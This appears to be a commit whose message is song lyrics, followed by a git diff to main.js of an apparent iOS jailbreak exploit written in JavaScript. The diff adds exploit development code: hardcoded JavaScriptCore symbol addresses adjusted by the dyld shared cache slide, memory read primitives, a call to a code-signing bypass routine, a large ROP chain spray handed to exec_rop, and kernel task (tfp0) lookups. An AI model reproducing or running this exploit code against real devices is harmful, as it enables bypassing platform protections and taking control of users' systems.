I live in a constant state of fear and misery

Do you miss me anymore?
And I don't even notice
When it hurts anymore
Anymore
Anymore
Anymore

1 files changed, 92 insertions, 1 deletions

diff --git a/src/js/main.js b/src/js/main.js
index 7021ab1..c6ceba0 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -19,6 +19,8 @@ var PROT_EXEC = 0x4;
 var MAP_PRIVATE = 0x2;
 var MAP_ANON = 0x1000;
 
+var victim = {a: 13.37};
+
 /*
  *  leftover shit from jsc_fun, used to be using `log`
  */
@@ -32,6 +34,10 @@ try {
 	puts = function (){};
 }
 
+var JSStringCreateWithUTF8CString = 0x239f9d0d;
+var JSObjectGetProperty = 0x239fa411;
+var JSContextGetGlobalObject = 0x239f8dfd;
+
 function main() {
 	/*
 	 *  get slide and calculate slid base
@@ -48,6 +54,8 @@ function main() {
 
 	init_sptr_heap();
 
+	scall("printf", "%x %x %x %x", 0x41, 0x42, 0x43, 0x44);
+
 	puts("we out here");
 	puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");
 
@@ -56,9 +64,92 @@ function main() {
 	printf("*(uint16_t*)base = 0x%x\n", read_u16(base));
 	printf("*(uint32_t*)base = 0x%x\n", read_u32(base));
 
-	var tfp0 = get_kernel_task();
+	var dyld_shc_slide = get_dyld_shc_slide();
+
+	sym_cache["JSStringCreateWithUTF8CString"] = JSStringCreateWithUTF8CString + dyld_shc_slide;
+	sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide;
+	sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
+
+	prep_shit();
 
+	large_buf[0] = 0x41424344;
+	printf("%x\n", read_u32(large_buf_ptr));
+
+	csbypass();
+
+	return;
+	
+	var tfp0 = get_kernel_task();
+	
 	printf("tfp0=%x\n", tfp0);
+	
+	return;
+
+	printf("dead?\n");
+	var string_ref = scall("JSStringCreateWithUTF8CString", sptr("victim"));
+	printf("dead? %x\n", string_ref);
+	var global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
+	printf("dead? %x\n", global_object);
+	var jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
+	printf("dead?\n");
+
+	printf("%x\n", jsobj_addr);
+//	printf("%s\n", hexdump(read_buf(jsobj_addr - 0x100, 0x200), 8, 2, jsobj_addr - 0x100, 8, '0'));
+	victim.target = parent;
+	printf("%x\n", read_u32(jsobj_addr + 0x18));
+//	printf("%s\n", prim_dump_u32(read_buf(jsobj_addr - 0x10, 0x60), jsobj_addr - 0x10));
+//	printf("%s\n", hexdump(read_buf(jsobj_addr - 0x100, 0x200), 8, 2, jsobj_addr - 0x100, 8, '0'));
+
+	/*
+	    UIAlertView *alert = [[UIAlertView alloc] initWithTitle:@"ROFL" 
+                                                    message:@"Dee dee doo doo." 
+                                                    delegate:self 
+                                                    cancelButtonTitle:@"OK" 
+                                                    otherButtonTitles:nil];
+		[alert show];
+	 */
+
+	return;
+
+	var rop_buf = new Array();
+	var nop = (0x781a | 1) + slid;
+	var zero_arr = [].slice.call(u32_to_u8x4(0));
+	var nop_arr = [].slice.call(u32_to_u8x4(nop));
+	rop_buf.push(0);
+	rop_buf.push(0);
+	rop_buf.push(0);
+	rop_buf.push(0);
+	rop_buf.push(0);
+	rop_buf.push(0);
+	rop_buf.push(0);
+	rop_buf.push(nop);
+	for (var i = 0; i < 0x40000; i++) {
+		rop_buf.push(0);
+		rop_buf.push(0);
+		rop_buf.push(0);
+		rop_buf.push(0);
+		rop_buf.push(nop);
+		if (i % 0x1000 == 0) {
+			printf("%x\n", i);
+		}
+	}
+	rop_buf.push(0);
+	rop_buf.push(0);
+	rop_buf.push(0);
+	rop_buf.push(0);
+	rop_buf.push(0x41414141);
+
+	printf("gen'd buf\n");
+
+//	printf("%s\n", rop_buf[0].toString(16));
+	
+	printf("exec'ing\n");
+	exec_rop(rop_buf);
+	printf("done\n");
+
+//	var tfp0 = get_kernel_task();
+
+//	printf("tfp0=%x\n", tfp0);
 
 	return;